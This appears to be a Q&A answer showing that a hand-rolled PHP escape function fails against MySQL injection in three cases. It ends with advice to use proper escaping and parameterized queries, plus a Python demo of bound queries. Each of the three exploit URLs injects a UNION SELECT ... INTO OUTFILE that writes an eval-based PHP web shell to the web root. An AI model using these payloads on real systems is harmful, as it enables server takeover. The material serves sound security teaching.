<p>If you are <strong>just</strong> replacing <code>'</code> with <code>''</code> then you could exploit this by injecting a <code>\'</code>, which will turn into a <code>\''</code>; this will allow you to break out because it gives you a "character literal" single-quote and a real single-quote. However, the replacement of <code>"\\"</code> with <code>"\\\\"</code> negates this attack. The double-single-quote is used to "escape" single quotes for MS-SQL; this isn't proper for MySQL, but it can work.</p>

<p>The following code <strong>proves</strong> that this escape function is safe for all except <strong>three conditions</strong>. This code permutes through all possible variations of control characters, testing each one to make sure an error doesn't occur with a single-quote-encased select statement. This code was tested on MySQL 5.1.41.</p>

<pre><code>&lt;?php
// Uses the legacy mysql_* extension (removed in PHP 7); tested against MySQL 5.1.41.
mysql_connect("localhost", 'root', '');

// The escape routine under test: double single quotes, then double backslashes.
function escape($value) {
    $value = str_replace("'", "''", $value);
    $value = str_replace("\\", "\\\\", $value);
    return $value;
}

// Every 4-character combination of these is escaped, wrapped in single quotes
// and sent to MySQL; a syntax error means the escape routine let something through.
$chars = array("'", "\\", "\0", "a");
for ($w = 0; $w &lt; 4; $w++) {
    for ($x = 0; $x &lt; 4; $x++) {
        for ($y = 0; $y &lt; 4; $y++) {
            for ($z = 0; $z &lt; 4; $z++) {
                mysql_query("select '" . escape($chars[$w] . $chars[$x] . $chars[$y] . $chars[$z]) . "'")
                    or die("!!!! \n$w $x $y $z " . mysql_error());
            }
        }
    }
}
print "Escape function is safe :(";
?&gt;
</code></pre>

<p><strong>Vulnerable Condition 1: no quote marks used.</strong></p>

<pre><code>// id is spliced in unquoted, so escape() has nothing to act on
mysql_query("select username from users where id=" . escape($_GET['id']));
</code></pre>

<p>Exploit:</p>

<pre><code>http://localhost/sqli_test.php?id=union select "&lt;?php eval($_GET[e]);?&gt;" into outfile "/var/www/backdoor.php"
</code></pre>

<p><strong>Vulnerable Condition 2: double quote marks used</strong></p>

<pre><code>// escape() never touches double quotes, so the delimiter can be closed
mysql_query("select username from users where id=\"" . escape($_GET['id']) . "\"");
</code></pre>

<p>Exploit:</p>

<pre><code>http://localhost/sqli_test.php?id=" union select "&lt;?php eval($_GET[e]);?&gt;" into outfile "/var/www/backdoor.php" -- 1
</code></pre>

<p><strong>Vulnerable Condition 3: single quotes are used, however an <a href="http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string" rel="noreferrer">alternative character set is used.</a></strong></p>

<pre><code>// a multi-byte charset lets a lead byte swallow the backslash that escape() inserted
mysql_set_charset("GBK");
mysql_query("select username from users where id='" . escape($_GET['id']) . "'");
</code></pre>

<p>Exploit:</p>

<pre><code>http://localhost/sqli_test.php?id=%bf%27 union select "&lt;?php eval($_GET[e]);?&gt;" into outfile "/var/www/backdoor.php" -- 1
</code></pre>

<p>The conclusion is to always use <code>mysql_real_escape_string()</code> as the escape routine for MySQL. Parameterized query libraries like pdo and adodb always use <code>mysql_real_escape_string()</code> when connected to a mysql database. <code>addslashes()</code> is <strong>FAR BETTER</strong> of an escape routine because it takes care of vulnerable condition 2. It should be noted that not even <code>mysql_real_escape_string()</code> will stop condition 1, however a parameterized query library will.</p>
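<p>The answer's closing point, that escaping cannot help in an unquoted numeric context while a parameterized query can, is illustrated by the following added example. It is not part of the original answer: it reproduces the answer's <code>escape()</code> in Python, uses an in-memory <code>sqlite3</code> database as a stand-in for MySQL (an assumption; the binding semantics are the same DB-API idea the answer attributes to pdo and adodb), and the table rows, the probe value <code>0 or 1=1</code>, and the function names <code>lookup_concat</code>, <code>lookup_param</code> and <code>lookup_typed</code> are all constructed here.</p>

```python
import sqlite3


def escape(value: str) -> str:
    # The answer's hand-rolled escape, reproduced: double quotes, then double backslashes.
    value = value.replace("'", "''")
    value = value.replace("\\", "\\\\")
    return value


def make_db() -> sqlite3.Connection:
    # Constructed sample data; sqlite3 in memory stands in for the MySQL server.
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer primary key, username text)")
    conn.executemany("insert into users values (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def lookup_concat(conn: sqlite3.Connection, user_id: str) -> list:
    # Vulnerable condition 1: the id is spliced in unquoted, so escape() has
    # no quote or backslash to act on and the input becomes part of the SQL.
    sql = "select username from users where id=" + escape(user_id)
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn: sqlite3.Connection, user_id: str) -> list:
    # Hardened form: the value is bound to a placeholder and never becomes SQL text,
    # so "0 or 1=1" is compared to the id column as a single (non-matching) value.
    rows = conn.execute("select username from users where id=?", (user_id,))
    return [row[0] for row in rows]


def lookup_typed(conn: sqlite3.Connection, user_id: str) -> list:
    # Belt and braces for numeric ids: enforce the type before the value reaches
    # the query at all, so a non-integer request is rejected outright.
    try:
        numeric_id = int(user_id)
    except ValueError:
        return []
    rows = conn.execute("select username from users where id=?", (numeric_id,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    probe = "0 or 1=1"  # constructed probe: no quotes, so escape() leaves it unchanged
    print("concat :", lookup_concat(db, probe))  # every row comes back
    print("param  :", lookup_param(db, probe))   # nothing matches
    print("typed  :", lookup_typed(db, probe))   # rejected before the query
```

<p>Running it shows the concatenated query returning both users for the probe while the bound and type-checked versions return nothing; the same three functions agree on a legitimate id such as <code>1</code>. The typed variant is worth keeping even alongside binding, since it turns malformed ids into an application-level error rather than a silent empty result.</p>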